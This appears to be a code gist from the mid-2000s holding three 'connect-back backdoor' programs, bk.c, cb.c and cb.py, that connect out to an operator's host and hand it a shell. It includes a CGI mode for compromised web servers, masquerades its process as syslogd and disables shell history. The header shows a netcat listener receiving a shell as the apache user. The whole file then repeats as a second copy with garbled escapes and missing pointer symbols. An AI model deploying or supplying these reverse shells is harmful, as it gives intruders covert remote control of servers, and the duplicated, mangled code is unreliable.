wofeiwo/bk.c

## bk.c
/*
Connect back tools
compile under linux
2003-07-11 now support FreeBSD ..
now support user define echo value
[bkbll@mobile bkbll]$ uname -a
Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
%uname -a
FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555
Connect back tools bye bkbll(bkbll@cnhonker.net)
http://www.cnhonker.net
Trying 192.168.8.110:5555....ok
pid 3304 will manage our request
on the 192.168.8.110:
d:\>nc -l -p 5555
sh-2.05b$
this tool support CGI URL:
such as:
[bkbll@mobile ownprog]$ lynx http://192.168.8.114/cgi-bin/bkbll/....168.8.110:5555
then on 192.168.8.110:
d:\>nc -l -p 5555
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$

*/
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <pwd.h>
#include <fcntl.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef BSD
#define TIOCSCTTY 0x540E
#define TIOCSPGRP 0x5410
#endif
#define TCSETA 0x5406
#define MAXSIZE 512
#define HOST_NAME_LENGTH 40
#define ENV_SIZE 2000
#define COMM_MASQ "syslogd -m 1 "
#define MAX(a,b) a>b?a:b

#define SUSP_KEY 0x1A
#define INTR_KEY 0x03
#define QUIT_KEY 0x1C
#define VEOF_KEY 0x04

#define VERSION "1.0"

extern int errno;
int have_pt_head=0,cgicn=0,not_execu=1,ifecho=0;
char prompt[1]="$";
struct termios parentterm;
char *argenv_t[]={
"HOSTNAME=mobile",
"LANG=en_US",
"LESSOPEN=|/usr/bin/lesspipe.sh %s",
"USER=apache",
"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:",
"INPUTRC=/etc/inputrc",
"LOGNAME=apache",
"SHLVL=1",
"SHELL=/bin/sh",
"HISTSIZE=0",
"TERM=xterm",
"PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/sbin:/sbin"
};

int commonexec(int fd,char *argenv[]);
int usetty(int *pty,int *tty,char *ttyname);
int client_connect(int sockfd,char* server,int port);
void exec_command(int);
void print_ver();
void pt_head();
void pt_htmlhead();
void pt_htmlend();

main(int argc,char *argv[],char **env)
{
int target_port,clisocket;
unsigned int a,b,c;
struct sockaddr_in client;
struct hostent *host;
int pid;
char action[31],target_host[20];
char *p;

if((argc>2) || (getenv("REQUEST_METHOD")==NULL))
{ /* not cgi connect */

print_ver("");
if(argc<3){printf("Usage:%s <host> <port> [-e]\r\n",argv[0]);exit(0);}
target_port=atoi(argv[2]);
cgicn=0;
if ((argc > 3) && (strcmp("-e",argv[3])==0))
ifecho=1;
}
else
{
pt_head();
pt_htmlhead();
print_ver("<br>");
if(strncasecmp(getenv("REQUEST_METHOD"),"get",3)!=0)
{
printf("Only support get REQUEST_METHOD\r\n");
pt_htmlend();
}
//memcpy(user_from_ip,getenv("REMOTE_ADDR"),15);
memcpy(action,getenv("QUERY_STRING"),30);
a=(unsigned int)action;
if(index(action,':')==NULL) {printf("syntax error,for example:http://xxx.com/cgi-bin/cnto?192.168.7.110:53:-e\r\n");pt_htmlend();}
b=(unsigned int)index(action,':');
c=(b-a)>19?19:(b-a);
memcpy(target_host,action,c);
target_host[c]=0; // get the host
target_port=atoi((char *)b+1); //get the port
//have the -e value?
//printf("the string:%s<br>\r\n",(char*)(b+1));
if((p=rindex(action,':'))!=NULL)
{
//printf("after cmp:%s<br>\r\n",p+1);
if(strcmp(p+1,"-e")==0) ifecho=1;
}

cgicn=1;
}
/* creat socket to other host */
if((clisocket=socket(AF_INET,SOCK_STREAM,0))<0) {perror("creat socket error");}
//printf("cgicn=%d,Trying connect \r\n",cgicn);
if(cgicn)
{
if(client_connect(clisocket,(char *)target_host,target_port)<0){pt_htmlend();close(clisocket);exit(0);}
}
else
{
if(client_connect(clisocket,(char *)argv[1],target_port)<0){close(clisocket);exit(0);}
}
memcpy(argv[0],COMM_MASQ,sizeof(COMM_MASQ));
signal(SIGCHLD,SIG_IGN);
tcgetattr(2,&parentterm);
pid = fork();
if (pid !=0 )
{
if(cgicn)
printf("<br>\r\n");
if(ifecho ==1 )
printf("Open echo on tty\r\n");
else
{
printf("Close echo on tty\r\n");
}
if(cgicn)
printf("<br>\r\n");
printf("pid %d will manage our request\r\n", pid);
//wait(NULL);
if(cgicn)
pt_htmlend();
exit(0);
}
exec_command(clisocket);
write(clisocket,"See u again\r\n",13);
close(clisocket);

}


void exec_command(int fd)
{

int pid,pid2,i,pty,tty,read1,read2;
char host_name[HOST_NAME_LENGTH],tmpbuf[MAXSIZE],buffer1[MAXSIZE],buffer2[MAXSIZE];
struct passwd *user_info;
fd_set readfd;
struct termios oldterm,newterm;
char ttyname[20];


if(usetty(&pty,&tty,ttyname)<0)
{
printf("Cannot fork tty\r\n");
commonexec(fd,argenv_t);
return;
}
//setsid();
pid=fork();
if(pid==0)
{

setsid();
tty=open(ttyname,O_RDWR);
ioctl(tty, TIOCSCTTY);
//tcsetattr(tty,TCSANOW,&parentterm);
pid=getpid();
ioctl (tty, TIOCSPGRP, &pid);
tcgetattr(tty,&oldterm);
if(ifecho == 0)
{
newterm = oldterm;
newterm.c_lflag &= ~(ICANON | ECHO | ISIG |IEXTEN );
tcsetattr(tty,TCSANOW,&newterm);
}
else
{
newterm = oldterm;
newterm.c_lflag |= ICANON | ISIG | IEXTEN ;
tcsetattr(tty,TCSANOW,&newterm);
}

/* close local part of connection */
close(fd);
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);
//dup2(fd,tty);
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
close(pty);
if(cgicn)
execle("/bin/sh","sh","-ip",NULL,argenv_t);
else
execl("/bin/sh","sh","-ip",NULL);
}
#ifndef BSD
close(tty);
#endif
memset(buffer1,0,MAXSIZE);
memset(buffer2,0,MAXSIZE);
//write(pty,"alias ls='ls --color'\r\n",strlen("alias ls='ls --color'\r\n"));

while (1)
{
/* watch tty and client side */
FD_ZERO(&readfd);
FD_SET(pty, &readfd);
FD_SET(fd, &readfd);
if (select(MAX(fd,pty)+1,&readfd, NULL, NULL, NULL) < 0)break;
if (FD_ISSET(pty, &readfd))
{

read1 = read(pty, buffer1, MAXSIZE);
if (read1 <= 0) break;
if (write(fd, buffer1, read1) <= 0) break;
memset(buffer1,0,MAXSIZE);
}
if (FD_ISSET(fd, &readfd))
{
read2 = read(fd, buffer2, MAXSIZE);
if (read2 <= 0) break;
if (write(pty, buffer2, read2) <= 0) break;
memset(buffer2,0,MAXSIZE);
}
}
#ifdef BSD
close(tty);
#endif
close(pty);
return;
}

void print_ver(char *tags)
{
printf("Connect back tools(%s) bye bkbll(bkbll@cnhonker.net)%s\r\n",VERSION,tags);
printf("http://www.cnhonker.net%s%s\r\n\r\n",tags,tags);
}

int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;

if((host=gethostbyname(server))==NULL)
{
printf("gethostbyname(%s) error\n",server);
return(-1);
}

bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("Trying %s:%d....",server,port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("error:%s\r\n",strerror(errno));
return(-1);
}
printf("ok\r\n");
return(0);
}
int usetty(int *pty,int *tty,char *ttyname)
{
char series[] = "pqrstuwxyzabcde";
char subs[] = "0123456789abcdef";
char ptynm[]="/dev/pty";
char ttynm[]="/dev/tty";
int i,j,slen,sublen,a;
char ptyname[20];
strcpy(ptyname,ptynm);
strcpy(ttyname,ttynm);
a=strlen(ptynm);
sublen=strlen(subs);
slen=strlen(series);
//printf("fork tty...\r\n");
//a=sublen=strlen(ttynm);
for(i=0;i<slen;i++)
{
//printf("fork tty...\r\n");
for(j=0;j<sublen;j++)
{
ttyname[a]=ptyname[a]=series[i];
ttyname[a+1]=ptyname[a+1]=subs[j];
ttyname[a+2]=ptyname[a+2]=0;
#ifdef DEBUG
printf("check pty:%s........",ptyname);
fflush(stdout);
#endif
*pty=open(ptyname,O_RDWR);
if(*pty<0)
{
#ifdef DEBUG
printf("failed\r\n");
#endif
continue;
}
#ifdef sun
else
{
int pgrp_rtn;
if (ioctl(*pty, TIOCGPGRP, &pgrp_rtn) == 0 || errno != EIO)
{
close(*pty);
#ifdef DEBUG
printf("failed\r\n");
#endif
continue;
}
}
#endif

#ifdef DEBUG
printf("open it\r\n");
printf("check tty:%s........",ttyname);
fflush(stdout);
#endif
*tty=open(ttyname,O_RDWR);
if(*tty<0)
{
#ifdef DEBUG
printf("failed\r\n");
#endif
continue;
}
#ifdef DEBUG
printf("open it\r\n");
#endif
return(0);
}
}
return(-1);
}

int commonexec(int fd,char *argenv[])
{
int result,read1,need_exec,pid;
fd_set readfd;
char read_in[MAXSIZE],exec_result[MAXSIZE];

if(write(fd,prompt,1)<1){printf("write to client error;%s\r\n",strerror(errno));}
while(1)
{
FD_ZERO(&readfd);
FD_SET(fd,&readfd);

need_exec=1;
result=select(fd+1,&readfd,NULL,NULL,NULL);
if(result<0){printf("select error\r\n");return;}
if(FD_ISSET(fd,&readfd))
{
read1=read(fd,read_in,MAXSIZE);
if(read1<=0)return;
/* fork a child to exec the command */
//printf("read_in=%s<br>\r\n",read_in);
if(memcmp(read_in,"exit",4)==0){break;}
pid=fork();
if(pid==0) //child process
{
dup2(fd,0);
dup2(fd,1);
dup2(fd,2);
execle("/bin/sh","/bin/sh","-c",read_in,NULL,argenv);
}
waitpid(pid,NULL,0);
memset(read_in,0,MAXSIZE);
if(write(fd,prompt,1)<1){perror("write to client error");}
}

}
return(0);
}

void pt_head()
{
if(have_pt_head==0)
{
printf("Content-type:text/html\r\n\r\n");
have_pt_head=1;
}
}

void pt_htmlhead()
{
printf("<html>\r\n");
printf("<head>\r\n");
printf("<title>cgi connect back</title>\r\n");
printf("</head>\r\n");
printf("<body>\r\n");
}

void pt_htmlend()
{
printf("</body>\r\n");
printf("</html>\r\n");
exit(1);
}

## cb.c
/*
*******************************************************
** Connect_Back Backdoor
** Modified by wofeiwo <wofeiwo[0x40]gmail[0x2E]com>
** Date: Jun 14th 2006
*******************************************************
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

void usage();
char shell[]="/bin/bash";
char message[]="-------------------[ Welcome to shell ]------------------\n"
				"----------------------[ Enjoy it :) ]--------------------\n";
int sock;
int main(int argc, char *argv[])
{
	if(argc <3)
	{
		usage(argv[0]);
	}

	struct sockaddr_in server;
	if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
		printf("[-] Couldn't make socket!\n");
		exit(-1);
	}

	server.sin_family = AF_INET;
	server.sin_port = htons(atoi(argv[2]));
	server.sin_addr.s_addr = inet_addr(argv[1]);

	if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1)
	{
		printf("[-] Could not connect to remote shell!\n");
		exit(-1);
	}
	send(sock, message, sizeof(message), 0);
	dup2(sock, 0);
	dup2(sock, 1);
	dup2(sock, 2);
	execl(shell,"/bin/bash",(char *)0);
	close(sock);
	return 1;
}

void usage(char *pname[])
{
    printf("Connect back door\n\n");
	printf("Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>\n");
	printf("Date: Jun 15th 2006\n\n");
	printf("Usage: %s <reflect ip> <port>\n\n", pname);
	exit(-1);
}


## cb.py
#!/usr/bin/env python
#coding=utf-8
# Python Connect-back Backdoor
# Author: wofeiwo@80sec.com
# Version: 1.1
# Date: July 15th 2006
# Last Modified: August 17th 2009

import sys
import os
import pty
import socket
shell = "/bin/bash"

def usage(programname):
    print "Python Connect-back Backdoor"
    print "Date: August 17th 2009\n"
    print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
    if len(sys.argv) != 3:
        usage(sys.argv[0])
        sys.exit(1)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
        print "[+] Connect ok."
    except:
        print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2])
        sys.exit(2)
    s.send("-------------------- Python Connect-back Backdoor --------------------\n")
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    global shell
    pty.spawn(shell)
    print "See U!"
    s.close()

if __name__ == "__main__": main()
	/*
	Connect back tools
	compile under linux
	2003-07-11 now support FreeBSD ..
	now support user define echo value
	[bkbll@mobile bkbll]$ uname -a
	Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
	%uname -a
	FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
	[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555
	Connect back tools bye bkbll(bkbll@cnhonker.net)
	http://www.cnhonker.net
	Trying 192.168.8.110:5555....ok
	pid 3304 will manage our request
	on the 192.168.8.110:
	d:\>nc -l -p 5555
	sh-2.05b$
	this tool support CGI URL:
	such as:
	[bkbll@mobile ownprog]$ lynx http://192.168.8.114/cgi-bin/bkbll/....168.8.110:5555
	then on 192.168.8.110:
	d:\>nc -l -p 5555
	sh-2.05b$ id
	uid=48(apache) gid=48(apache) groups=48(apache)
	sh-2.05b$

	*/
	#include <stdlib.h>
	#include <netdb.h>
	#include <string.h>
	#include <unistd.h>
	#include <stdio.h>
	#include <errno.h>
	#include <pwd.h>
	#include <fcntl.h>
	#include <signal.h>
	#include <termios.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/wait.h>
	#include <sys/resource.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>
	#ifndef BSD
	#define TIOCSCTTY 0x540E
	#define TIOCSPGRP 0x5410
	#endif
	#define TCSETA 0x5406
	#define MAXSIZE 512
	#define HOST_NAME_LENGTH 40
	#define ENV_SIZE 2000
	#define COMM_MASQ "syslogd -m 1 "
	#define MAX(a,b) a>b?a:b

	#define SUSP_KEY 0x1A
	#define INTR_KEY 0x03
	#define QUIT_KEY 0x1C
	#define VEOF_KEY 0x04

	#define VERSION "1.0"

	extern int errno;
	int have_pt_head=0,cgicn=0,not_execu=1,ifecho=0;
	char prompt[1]="$";
	struct termios parentterm;
	char *argenv_t[]={
	"HOSTNAME=mobile",
	"LANG=en_US",
	"LESSOPEN=\|/usr/bin/lesspipe.sh %s",
	"USER=apache",
	"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:",
	"INPUTRC=/etc/inputrc",
	"LOGNAME=apache",
	"SHLVL=1",
	"SHELL=/bin/sh",
	"HISTSIZE=0",
	"TERM=xterm",
	"PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/sbin:/sbin"
	};

	int commonexec(int fd,char *argenv[]);
	int usetty(int pty,int tty,char *ttyname);
	int client_connect(int sockfd,char* server,int port);
	void exec_command(int);
	void print_ver();
	void pt_head();
	void pt_htmlhead();
	void pt_htmlend();

	main(int argc,char argv[],char *env)
	{
	int target_port,clisocket;
	unsigned int a,b,c;
	struct sockaddr_in client;
	struct hostent *host;
	int pid;
	char action[31],target_host[20];
	char *p;

	if((argc>2) \|\| (getenv("REQUEST_METHOD")==NULL))
	{ /* not cgi connect */

	print_ver("");
	if(argc<3){printf("Usage:%s <host> <port> [-e]\r\n",argv[0]);exit(0);}
	target_port=atoi(argv[2]);
	cgicn=0;
	if ((argc > 3) && (strcmp("-e",argv[3])==0))
	ifecho=1;
	}
	else
	{
	pt_head();
	pt_htmlhead();
	print_ver("<br>");
	if(strncasecmp(getenv("REQUEST_METHOD"),"get",3)!=0)
	{
	printf("Only support get REQUEST_METHOD\r\n");
	pt_htmlend();
	}
	//memcpy(user_from_ip,getenv("REMOTE_ADDR"),15);
	memcpy(action,getenv("QUERY_STRING"),30);
	a=(unsigned int)action;
	if(index(action,':')==NULL) {printf("syntax error,for example:http://xxx.com/cgi-bin/cnto?192.168.7.110:53:-e\r\n");pt_htmlend();}
	b=(unsigned int)index(action,':');
	c=(b-a)>19?19:(b-a);
	memcpy(target_host,action,c);
	target_host[c]=0; // get the host
	target_port=atoi((char *)b+1); //get the port
	//have the -e value?
	//printf("the string:%s<br>\r\n",(char*)(b+1));
	if((p=rindex(action,':'))!=NULL)
	{
	//printf("after cmp:%s<br>\r\n",p+1);
	if(strcmp(p+1,"-e")==0) ifecho=1;
	}

	cgicn=1;
	}
	/* creat socket to other host */
	if((clisocket=socket(AF_INET,SOCK_STREAM,0))<0) {perror("creat socket error");}
	//printf("cgicn=%d,Trying connect \r\n",cgicn);
	if(cgicn)
	{
	if(client_connect(clisocket,(char *)target_host,target_port)<0){pt_htmlend();close(clisocket);exit(0);}
	}
	else
	{
	if(client_connect(clisocket,(char *)argv[1],target_port)<0){close(clisocket);exit(0);}
	}
	memcpy(argv[0],COMM_MASQ,sizeof(COMM_MASQ));
	signal(SIGCHLD,SIG_IGN);
	tcgetattr(2,&parentterm);
	pid = fork();
	if (pid !=0 )
	{
	if(cgicn)
	printf("<br>\r\n");
	if(ifecho ==1 )
	printf("Open echo on tty\r\n");
	else
	{
	printf("Close echo on tty\r\n");
	}
	if(cgicn)
	printf("<br>\r\n");
	printf("pid %d will manage our request\r\n", pid);
	//wait(NULL);
	if(cgicn)
	pt_htmlend();
	exit(0);
	}
	exec_command(clisocket);
	write(clisocket,"See u again\r\n",13);
	close(clisocket);

	}



	void exec_command(int fd)
	{

	int pid,pid2,i,pty,tty,read1,read2;
	char host_name[HOST_NAME_LENGTH],tmpbuf[MAXSIZE],buffer1[MAXSIZE],buffer2[MAXSIZE];
	struct passwd *user_info;
	fd_set readfd;
	struct termios oldterm,newterm;
	char ttyname[20];


	if(usetty(&pty,&tty,ttyname)<0)
	{
	printf("Cannot fork tty\r\n");
	commonexec(fd,argenv_t);
	return;
	}
	//setsid();
	pid=fork();
	if(pid==0)
	{

	setsid();
	tty=open(ttyname,O_RDWR);
	ioctl(tty, TIOCSCTTY);
	//tcsetattr(tty,TCSANOW,&parentterm);
	pid=getpid();
	ioctl (tty, TIOCSPGRP, &pid);
	tcgetattr(tty,&oldterm);
	if(ifecho == 0)
	{
	newterm = oldterm;
	newterm.c_lflag &= ~(ICANON \| ECHO \| ISIG \|IEXTEN );
	tcsetattr(tty,TCSANOW,&newterm);
	}
	else
	{
	newterm = oldterm;
	newterm.c_lflag \|= ICANON \| ISIG \| IEXTEN ;
	tcsetattr(tty,TCSANOW,&newterm);
	}

	/* close local part of connection */
	close(fd);
	signal(SIGHUP, SIG_DFL);
	signal(SIGCHLD, SIG_DFL);
	//dup2(fd,tty);
	dup2(tty, 0);
	dup2(tty, 1);
	dup2(tty, 2);
	close(tty);
	close(pty);
	if(cgicn)
	execle("/bin/sh","sh","-ip",NULL,argenv_t);
	else
	execl("/bin/sh","sh","-ip",NULL);
	}
	#ifndef BSD
	close(tty);
	#endif
	memset(buffer1,0,MAXSIZE);
	memset(buffer2,0,MAXSIZE);
	//write(pty,"alias ls='ls --color'\r\n",strlen("alias ls='ls --color'\r\n"));

	while (1)
	{
	/* watch tty and client side */
	FD_ZERO(&readfd);
	FD_SET(pty, &readfd);
	FD_SET(fd, &readfd);
	if (select(MAX(fd,pty)+1,&readfd, NULL, NULL, NULL) < 0)break;
	if (FD_ISSET(pty, &readfd))
	{

	read1 = read(pty, buffer1, MAXSIZE);
	if (read1 <= 0) break;
	if (write(fd, buffer1, read1) <= 0) break;
	memset(buffer1,0,MAXSIZE);
	}
	if (FD_ISSET(fd, &readfd))
	{
	read2 = read(fd, buffer2, MAXSIZE);
	if (read2 <= 0) break;
	if (write(pty, buffer2, read2) <= 0) break;
	memset(buffer2,0,MAXSIZE);
	}
	}
	#ifdef BSD
	close(tty);
	#endif
	close(pty);
	return;
	}

	void print_ver(char *tags)
	{
	printf("Connect back tools(%s) bye bkbll(bkbll@cnhonker.net)%s\r\n",VERSION,tags);
	printf("http://www.cnhonker.net%s%s\r\n\r\n",tags,tags);
	}

	int client_connect(int sockfd,char* server,int port)
	{
	struct sockaddr_in cliaddr;
	struct hostent *host;

	if((host=gethostbyname(server))==NULL)
	{
	printf("gethostbyname(%s) error\n",server);
	return(-1);
	}

	bzero(&cliaddr,sizeof(struct sockaddr));
	cliaddr.sin_family=AF_INET;
	cliaddr.sin_port=htons(port);
	cliaddr.sin_addr=((struct in_addr )host->h_addr);
	printf("Trying %s:%d....",server,port);
	fflush(stdout);
	if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
	{
	printf("error:%s\r\n",strerror(errno));
	return(-1);
	}
	printf("ok\r\n");
	return(0);
	}
	int usetty(int pty,int tty,char *ttyname)
	{
	char series[] = "pqrstuwxyzabcde";
	char subs[] = "0123456789abcdef";
	char ptynm[]="/dev/pty";
	char ttynm[]="/dev/tty";
	int i,j,slen,sublen,a;
	char ptyname[20];
	strcpy(ptyname,ptynm);
	strcpy(ttyname,ttynm);
	a=strlen(ptynm);
	sublen=strlen(subs);
	slen=strlen(series);
	//printf("fork tty...\r\n");
	//a=sublen=strlen(ttynm);
	for(i=0;i<slen;i++)
	{
	//printf("fork tty...\r\n");
	for(j=0;j<sublen;j++)
	{
	ttyname[a]=ptyname[a]=series[i];
	ttyname[a+1]=ptyname[a+1]=subs[j];
	ttyname[a+2]=ptyname[a+2]=0;
	#ifdef DEBUG
	printf("check pty:%s........",ptyname);
	fflush(stdout);
	#endif
	*pty=open(ptyname,O_RDWR);
	if(*pty<0)
	{
	#ifdef DEBUG
	printf("failed\r\n");
	#endif
	continue;
	}
	#ifdef sun
	else
	{
	int pgrp_rtn;
	if (ioctl(*pty, TIOCGPGRP, &pgrp_rtn) == 0 \|\| errno != EIO)
	{
	close(*pty);
	#ifdef DEBUG
	printf("failed\r\n");
	#endif
	continue;
	}
	}
	#endif

	#ifdef DEBUG
	printf("open it\r\n");
	printf("check tty:%s........",ttyname);
	fflush(stdout);
	#endif
	*tty=open(ttyname,O_RDWR);
	if(*tty<0)
	{
	#ifdef DEBUG
	printf("failed\r\n");
	#endif
	continue;
	}
	#ifdef DEBUG
	printf("open it\r\n");
	#endif
	return(0);
	}
	}
	return(-1);
	}

	int commonexec(int fd,char *argenv[])
	{
	int result,read1,need_exec,pid;
	fd_set readfd;
	char read_in[MAXSIZE],exec_result[MAXSIZE];

	if(write(fd,prompt,1)<1){printf("write to client error;%s\r\n",strerror(errno));}
	while(1)
	{
	FD_ZERO(&readfd);
	FD_SET(fd,&readfd);

	need_exec=1;
	result=select(fd+1,&readfd,NULL,NULL,NULL);
	if(result<0){printf("select error\r\n");return;}
	if(FD_ISSET(fd,&readfd))
	{
	read1=read(fd,read_in,MAXSIZE);
	if(read1<=0)return;
	/* fork a child to exec the command */
	//printf("read_in=%s<br>\r\n",read_in);
	if(memcmp(read_in,"exit",4)==0){break;}
	pid=fork();
	if(pid==0) //child process
	{
	dup2(fd,0);
	dup2(fd,1);
	dup2(fd,2);
	execle("/bin/sh","/bin/sh","-c",read_in,NULL,argenv);
	}
	waitpid(pid,NULL,0);
	memset(read_in,0,MAXSIZE);
	if(write(fd,prompt,1)<1){perror("write to client error");}
	}

	}
	return(0);
	}

	void pt_head()
	{
	if(have_pt_head==0)
	{
	printf("Content-type:text/html\r\n\r\n");
	have_pt_head=1;
	}
	}

	void pt_htmlhead()
	{
	printf("<html>\r\n");
	printf("<head>\r\n");
	printf("<title>cgi connect back</title>\r\n");
	printf("</head>\r\n");
	printf("<body>\r\n");
	}

	void pt_htmlend()
	{
	printf("</body>\r\n");
	printf("</html>\r\n");
	exit(1);
	}
	/*
	*******************************************************
	** Connect_Back Backdoor
	** Modified by wofeiwo <wofeiwo[0x40]gmail[0x2E]com>
	** Date: Jun 14th 2006
	*******************************************************
	*/

	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <unistd.h>
	#include <fcntl.h>
	#include <netinet/in.h>
	#include <netdb.h>

	void usage();
	char shell[]="/bin/bash";
	char message[]="-------------------[ Welcome to shell ]------------------\n"
	"----------------------[ Enjoy it :) ]--------------------\n";
	int sock;
	int main(int argc, char *argv[])
	{
	if(argc <3)
	{
	usage(argv[0]);
	}

	struct sockaddr_in server;
	if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
	printf("[-] Couldn't make socket!\n");
	exit(-1);
	}

	server.sin_family = AF_INET;
	server.sin_port = htons(atoi(argv[2]));
	server.sin_addr.s_addr = inet_addr(argv[1]);

	if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1)
	{
	printf("[-] Could not connect to remote shell!\n");
	exit(-1);
	}
	send(sock, message, sizeof(message), 0);
	dup2(sock, 0);
	dup2(sock, 1);
	dup2(sock, 2);
	execl(shell,"/bin/bash",(char *)0);
	close(sock);
	return 1;
	}

	void usage(char *pname[])
	{
	printf("Connect back door\n\n");
	printf("Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>\n");
	printf("Date: Jun 15th 2006\n\n");
	printf("Usage: %s <reflect ip> <port>\n\n", pname);
	exit(-1);
	}
	#!/usr/bin/env python
	#coding=utf-8
	# Python Connect-back Backdoor
	# Author: wofeiwo@80sec.com
	# Version: 1.1
	# Date: July 15th 2006
	# Last Modified: August 17th 2009

	import sys
	import os
	import pty
	import socket
	shell = "/bin/bash"

	def usage(programname):
	print "Python Connect-back Backdoor"
	print "Date: August 17th 2009\n"
	print "Usage: %s <conn_back_host> <port>\n" % programname

	def main():
	if len(sys.argv) != 3:
	usage(sys.argv[0])
	sys.exit(1)

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
	s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
	print "[+] Connect ok."
	except:
	print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2])
	sys.exit(2)
	s.send("-------------------- Python Connect-back Backdoor --------------------\n")
	os.dup2(s.fileno(), 0)
	os.dup2(s.fileno(), 1)
	os.dup2(s.fileno(), 2)
	global shell
	pty.spawn(shell)
	print "See U!"
	s.close()

	if __name__ == "__main__": main()